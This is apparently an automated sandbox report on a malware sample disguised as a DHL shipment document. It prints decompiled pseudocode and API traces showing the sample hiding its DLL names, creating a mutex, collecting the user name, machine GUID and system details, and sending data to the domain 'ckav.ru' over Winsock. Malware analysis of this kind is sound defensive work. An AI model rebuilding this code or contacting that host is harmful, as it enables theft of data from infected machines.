                    C-Code - Quality: 79%
                    			E00413866(void* __eflags) {
                    				short _v6;
                    				short _v8;
                    				short _v10;
                    				short _v12;
                    				short _v14;
                    				short _v16;
                    				short _v18;
                    				short _v20;
                    				short _v22;
                    				char _v24;
                    				short _v28;
                    				short _v30;
                    				short _v32;
                    				short _v34;
                    				short _v36;
                    				short _v38;
                    				short _v40;
                    				short _v42;
                    				short _v44;
                    				short _v46;
                    				char _v48;
                    				short _v52;
                    				short _v54;
                    				short _v56;
                    				short _v58;
                    				short _v60;
                    				short _v62;
                    				short _v64;
                    				short _v66;
                    				short _v68;
                    				short _v70;
                    				short _v72;
                    				short _v74;
                    				char _v76;
                    				void* __ebx;
                    				void* __edi;
                    				void* _t38;
                    				short _t43;
                    				short _t44;
                    				short _t45;
                    				short _t46;
                    				short _t47;
                    				short _t48;
                    				short _t50;
                    				short _t51;
                    				short _t52;
                    				short _t54;
                    				short _t55;
                    				intOrPtr* _t57;
                    				intOrPtr* _t59;
                    				intOrPtr* _t61;
                    				void* _t63;
                    				WCHAR* _t65;
                    				long _t68;
                    				void* _t75;
                    				short _t76;
                    				short _t78;
                    				short _t83;
                    				short _t84;
                    				short _t85;
                    
                    				E00402C6C(_t38);
                    				E004031E5(_t75, 0, 0xd1e96fcd, 0, 0);
                    				SetErrorMode(3); // executed
                    				_t43 = 0x4f;
                    				_v76 = _t43;
                    				_t44 = 0x4c;
                    				_v74 = _t44;
                    				_t45 = 0x45;
                    				_v72 = _t45;
                    				_t46 = 0x41;
                    				_v70 = _t46;
                    				_t47 = 0x55;
                    				_v68 = _t47;
                    				_t48 = 0x54;
                    				_t76 = 0x33;
                    				_t84 = 0x32;
                    				_t83 = 0x2e;
                    				_t78 = 0x64;
                    				_t85 = 0x6c;
                    				_v66 = _t48;
                    				_v52 = 0;
                    				_t50 = 0x77;
                    				_v48 = _t50;
                    				_t51 = 0x73;
                    				_v46 = _t51;
                    				_t52 = 0x5f;
                    				_v42 = _t52;
                    				_v28 = 0;
                    				_t54 = 0x6f;
                    				_v24 = _t54;
                    				_t55 = 0x65;
                    				_v20 = _t55;
                    				_v64 = _t76;
                    				_v62 = _t84;
                    				_v60 = _t83;
                    				_v58 = _t78;
                    				_v56 = _t85;
                    				_v54 = _t85;
                    				_v44 = _t84;
                    				_v40 = _t76;
                    				_v38 = _t84;
                    				_v36 = _t83;
                    				_v34 = _t78;
                    				_v32 = _t85;
                    				_v30 = _t85;
                    				_v22 = _t85;
                    				_v18 = _t76;
                    				_v16 = _t84;
                    				_v14 = _t83;
                    				_v12 = _t78;
                    				_v10 = _t85;
                    				_v8 = _t85;
                    				_v6 = 0;
                    				_t57 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				 *_t57( &_v76);
                    				_t59 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				 *_t59( &_v48);
                    				_t61 = E004031E5(0, 0, 0xe811e8d4, 0, 0);
                    				_t81 =  &_v24;
                    				 *_t61( &_v24); // executed
                    				_t63 = E00414059(); // executed
                    				if(_t63 != 0) {
                    					_t65 = E00413D97(0);
                    					E004031E5(0, 0, 0xcf167df4, 0, 0);
                    					CreateMutexW(0, 1, _t65); // executed
                    					_t68 = GetLastError();
                    					_t92 = _t68 - 0xb7;
                    					if(_t68 == 0xb7) {
                    						E00413B81(0);
                    						_pop(_t81); // executed
                    					}
                    					E00413003(_t92); // executed
                    					E00412B2E(_t92); // executed
                    					E00412D31(_t81, _t84); // executed
                    					E00413B3F();
                    					E00413B81(0);
                    					 *0x49fdd0 = 1;
                    				}
                    				return 0;
                    			}

                    APIs
                    • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                    • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                    • GetLastError.KERNEL32 ref: 0041399E
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Error$CreateLastModeMutex
                    • String ID:
                    • API String ID: 3448925889-0
                    • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                    • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                    • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004042CF(void* __ebx, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
                    				long _v8;
                    				void* _t7;
                    				long _t10;
                    				void* _t21;
                    				struct _OVERLAPPED* _t24;
                    
                    				_t14 = __ebx;
                    				_t24 = 0;
                    				_v8 = 0;
                    				E004031E5(__ebx, 0, 0xe9fabb88, 0, 0);
                    				_t7 = CreateFileW(_a4, 0xc0000000, 0, 0, 4, 0x80, 0); // executed
                    				_t21 = _t7;
                    				if(_t21 != 0xffffffff) {
                    					E004031E5(__ebx, 0, 0xeebaae5b, 0, 0);
                    					_t10 = SetFilePointer(_t21, 0, 0, 2); // executed
                    					if(_t10 != 0xffffffff) {
                    						E004031E5(_t14, 0, 0xc148f916, 0, 0);
                    						WriteFile(_t21, _a8, _a12,  &_v8, 0); // executed
                    						_t24 =  !=  ? 1 : 0;
                    					}
                    					E00403C40(_t21); // executed
                    				}
                    				return _t24;
                    			}

                    APIs
                    • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                    • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$CreatePointerWrite
                    • String ID:
                    • API String ID: 3672724799-0
                    • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                    • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                    • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 34%
                    			E00412D31(void* __ecx, void* __edi) {
                    				long _v8;
                    				intOrPtr _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				char _v24;
                    				char _v40;
                    				void* __ebx;
                    				intOrPtr* _t10;
                    				void* _t11;
                    				void* _t25;
                    				void* _t26;
                    				void* _t27;
                    				void* _t35;
                    				void* _t53;
                    				char* _t57;
                    				void* _t58;
                    				void* _t61;
                    				void* _t64;
                    				void* _t65;
                    				intOrPtr* _t66;
                    				void* _t67;
                    				void* _t68;
                    				void* _t69;
                    				void* _t70;
                    				void* _t71;
                    				void* _t72;
                    				void* _t73;
                    
                    				_t53 = __ecx;
                    				_t10 =  *0x49fde0;
                    				_t68 = _t67 - 0x24;
                    				 *0x49fddc = 0x927c0;
                    				 *0x49fde4 = 0;
                    				_t75 = _t10;
                    				if(_t10 != 0) {
                    					L16:
                    					_push(1);
                    					_t11 = E004141A7(_t80,  *_t10,  *((intOrPtr*)(_t10 + 8))); // executed
                    					_t61 = _t11;
                    					_t68 = _t68 + 0xc;
                    					if(_t61 != 0) {
                    						E004031E5(0, 0, 0xfcae4162, 0, 0);
                    						CreateThread(0, 0, E0041289A, _t61, 0,  &_v8); // executed
                    					}
                    					L004067C4(0xea60); // executed
                    					_pop(_t53);
                    				} else {
                    					_push(__edi);
                    					 *0x49fde0 = E004056BF(0x2bc);
                    					E00413DB7(_t53, _t75,  &_v40);
                    					_t57 =  &_v24;
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					asm("movsd");
                    					E004058D4( *0x49fde0, 0x12);
                    					E004058D4( *0x49fde0, 0x28);
                    					E00405872( *0x49fde0, "ckav.ru", 0, 0);
                    					_t69 = _t68 + 0x28;
                    					_t64 = E0040632F();
                    					_push(0);
                    					_push(1);
                    					if(_t64 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t70 = _t69 + 0x10;
                    					} else {
                    						_push(_t64);
                    						_push( *0x49fde0);
                    						E00405872();
                    						E00402BAB(_t64);
                    						_t70 = _t69 + 0x14;
                    					}
                    					_t58 = E00406130(_t57);
                    					_push(0);
                    					_push(1);
                    					_t77 = _t64;
                    					if(_t64 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						_t25 = E00405872();
                    						_t71 = _t70 + 0x10; // executed
                    					} else {
                    						_push(_t58);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t25 = E00402BAB(_t58);
                    						_t71 = _t70 + 0x14;
                    					}
                    					_t26 = E004061C3(_t25, 0, _t77); // executed
                    					_t65 = _t26;
                    					_push(0);
                    					_push(1);
                    					if(_t65 == 0) {
                    						_push(0);
                    						_push( *0x49fde0);
                    						_t27 = E00405872();
                    						_t72 = _t71 + 0x10;
                    					} else {
                    						_push(_t65);
                    						_push( *0x49fde0);
                    						E00405872();
                    						_t27 = E00402BAB(_t65);
                    						_t72 = _t71 + 0x14;
                    					}
                    					_t66 = E00406189(_t27);
                    					_t79 = _t66;
                    					if(_t66 == 0) {
                    						E00405781( *0x49fde0, 0);
                    						E00405781( *0x49fde0, 0);
                    						_t73 = _t72 + 0x10;
                    					} else {
                    						E00405781( *0x49fde0,  *_t66);
                    						E00405781( *0x49fde0,  *((intOrPtr*)(_t66 + 4)));
                    						E00402BAB(_t66);
                    						_t73 = _t72 + 0x14;
                    					}
                    					E004058D4( *0x49fde0, E004063B2(0, _t53, _t79));
                    					E004058D4( *0x49fde0, E004060BD(_t79)); // executed
                    					_t35 = E0040642C(_t79); // executed
                    					E004058D4( *0x49fde0, _t35);
                    					E004058D4( *0x49fde0, _v24);
                    					E004058D4( *0x49fde0, _v20);
                    					E004058D4( *0x49fde0, _v16);
                    					E004058D4( *0x49fde0, _v12);
                    					E00405872( *0x49fde0, E00413D97(0), 1, 0);
                    					_t68 = _t73 + 0x48;
                    				}
                    				_t80 =  *0x49fde4;
                    				if( *0x49fde4 == 0) {
                    					_t10 =  *0x49fde0;
                    					goto L16;
                    				}
                    				return E00405695(_t53,  *0x49fde0);
                    			}

                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                      • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                      • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$CreateFreeProcessThread_wmemset
                    • String ID: ckav.ru
                    • API String ID: 2915393847-2696028687
                    • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                    • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                    • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040632F() {
                    				char _v8;
                    				void* _t4;
                    				void* _t7;
                    				void* _t16;
                    
                    				_t16 = E00402B7C(0x208);
                    				if(_t16 == 0) {
                    					L4:
                    					_t4 = 0;
                    				} else {
                    					E0040338C(_t16, 0, 0x104);
                    					_t1 =  &_v8; // 0x4143e8
                    					_v8 = 0x208;
                    					_t7 = E00406069(_t16, _t1); // executed
                    					if(_t7 == 0) {
                    						E00402BAB(_t16);
                    						goto L4;
                    					} else {
                    						_t4 = _t16;
                    					}
                    				}
                    				return _t4;
                    			}

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • _wmemset.LIBCMT ref: 0040634F
                      • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateNameProcessUser_wmemset
                    • String ID: CA
                    • API String ID: 2078537776-1052703068
                    • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                    • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                    • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00406086(void* _a4, union _TOKEN_INFORMATION_CLASS _a8, void* _a12, long _a16, DWORD* _a20) {
                    				int _t7;
                    				void* _t8;
                    
                    				E004031E5(_t8, 9, 0xecae3497, 0, 0);
                    				_t7 = GetTokenInformation(_a4, _a8, _a12, _a16, _a20); // executed
                    				return _t7;
                    			}

                    APIs
                    • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: InformationToken
                    • String ID: IDA
                    • API String ID: 4114910276-365204570
                    • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                    • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                    • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00402C03(struct HINSTANCE__* _a4, char _a8) {
                    				_Unknown_base(*)()* _t5;
                    				void* _t6;
                    
                    				E004031E5(_t6, 0, 0xceb18abc, 0, 0);
                    				_t1 =  &_a8; // 0x403173
                    				_t5 = GetProcAddress(_a4,  *_t1); // executed
                    				return _t5;
                    			}

                    APIs
                    • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                    Strings
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc
                    • String ID: s1@
                    • API String ID: 190572456-427247929
                    • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                    • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                    • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E00404A52(void* _a4, char* _a8, char* _a12) {
                    				void* _v8;
                    				int _v12;
                    				void* __ebx;
                    				char* _t10;
                    				long _t13;
                    				char* _t27;
                    
                    				_push(_t21);
                    				_t27 = E00402B7C(0x208);
                    				if(_t27 == 0) {
                    					L4:
                    					_t10 = 0;
                    				} else {
                    					E00402B4E(_t27, 0, 0x208);
                    					_v12 = 0x208;
                    					E004031E5(0, 9, 0xf4b4acdc, 0, 0);
                    					_t13 = RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v8); // executed
                    					if(_t13 != 0) {
                    						E00402BAB(_t27);
                    						goto L4;
                    					} else {
                    						E004031E5(0, 9, 0xfe9f661a, 0, 0);
                    						RegQueryValueExA(_v8, _a12, 0, 0, _t27,  &_v12); // executed
                    						E00404A39(_v8); // executed
                    						_t10 = _t27;
                    					}
                    				}
                    				return _t10;
                    			}

                    APIs
                      • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                      • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                    • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                    • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateOpenProcessQueryValue
                    • String ID:
                    • API String ID: 1425999871-0
                    • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                    • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                    • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 40%
                    			E004060BD(void* __eflags) {
                    				signed int _v8;
                    				char _v12;
                    				short _v16;
                    				char _v20;
                    				void* __ebx;
                    				intOrPtr* _t12;
                    				signed int _t13;
                    				intOrPtr* _t14;
                    				signed int _t15;
                    				void* _t24;
                    
                    				_v16 = 0x500;
                    				_v20 = 0;
                    				_t12 = E004031E5(0, 9, 0xf3a0c470, 0, 0);
                    				_t13 =  *_t12( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
                    				_v8 = _t13;
                    				if(_t13 != 0) {
                    					_t14 = E004031E5(0, 9, 0xe3b938df, 0, 0);
                    					_t15 =  *_t14(0, _v12,  &_v8, _t24); // executed
                    					asm("sbb eax, eax");
                    					_v8 = _v8 &  ~_t15;
                    					E0040604F(_v12);
                    					return _v8;
                    				}
                    				return _t13;
                    			}

                    APIs
                    • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: CheckMembershipToken
                    • String ID:
                    • API String ID: 1351025785-0
                    • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                    • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                    • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403C62(void* __ebx, void* __eflags, WCHAR* _a4) {
                    				void* _t3;
                    				int _t5;
                    
                    				_t3 = E00403D4D(__eflags, _a4); // executed
                    				if(_t3 == 0) {
                    					__eflags = 0;
                    					E004031E5(__ebx, 0, 0xc8f0a74d, 0, 0);
                    					_t5 = CreateDirectoryW(_a4, 0); // executed
                    					return _t5;
                    				} else {
                    					return 1;
                    				}
                    			}

                    APIs
                    • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: CreateDirectory
                    • String ID:
                    • API String ID: 4241100979-0
                    • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                    • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                    • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E0040642C(void* __eflags) {
                    				short _v40;
                    				intOrPtr* _t6;
                    				void* _t10;
                    
                    				_t6 = E004031E5(_t10, 0, 0xe9af4586, 0, 0);
                    				 *_t6( &_v40); // executed
                    				return 0 | _v40 == 0x00000009;
                    			}

                    APIs
                    • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: InfoNativeSystem
                    • String ID:
                    • API String ID: 1721193555-0
                    • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                    • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                    • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 37%
                    			E00404EEA(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                    				intOrPtr _t5;
                    
                    				_t5 = _a12;
                    				if(_t5 == 0) {
                    					_t5 = E00405D0B(_a8) + 1;
                    				}
                    				__imp__#19(_a4, _a8, _t5, 0); // executed
                    				return _t5;
                    			}

                    0x00404eed
                    0x00404ef2
                    0x00404efd
                    0x00404efd
                    0x00404f07
                    0x00404f0e

                    APIs
                    • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: send
                    • String ID:
                    • API String ID: 2809346765-0
                    • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                    • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                    • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00403BD0(WCHAR* _a4, WCHAR* _a8, long _a12) {
                    				int _t6;
                    				void* _t7;
                    
                    				E004031E5(_t7, 0, 0xc9143177, 0, 0);
                    				_t6 = MoveFileExW(_a4, _a8, _a12); // executed
                    				return _t6;
                    			}

                    0x00403bdd
                    0x00403beb
                    0x00403bee

                    APIs
                    • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileMove
                    • String ID:
                    • API String ID: 3562171763-0
                    • Opcode ID: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction ID: 27267517ebbd606c040c475238707358b0366275ca1c9c11413b547716cf2561
                    • Opcode Fuzzy Hash: 7a0bb135e6e1f0606704ed46507384a8cac74e7a8e8860f1f6d7d5715d4ca302
                    • Instruction Fuzzy Hash: 5AC04C7500424C7FEF026EF19D05C7B3F5EEB49618F448825BD18D5421DA37DA216664
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WSAStartup.WS2_32(00000202,?), ref: 00404E08
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: Startup
                    • String ID:
                    • API String ID: 724789610-0
                    • Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
                    • Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
                    • Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040427D(WCHAR* _a4) {
                    				int _t4;
                    				void* _t5;
                    
                    				E004031E5(_t5, 0, 0xcac5886e, 0, 0);
                    				_t4 = SetFileAttributesW(_a4, 0x2006); // executed
                    				return _t4;
                    			}

                    0x0040428a
                    0x00404297
                    0x0040429a

                    APIs
                    • SetFileAttributesW.KERNELBASE(00000000,00002006,00000000,CAC5886E,00000000,00000000,?,00412C3B,00000000,00000000,?), ref: 00404297
                    Memory Dump Source
                    • Source File: 00000003.00000002.486364234.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_3_2_400000_DHL_Express_Shipment_DOC.jbxd
                    Yara matches
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
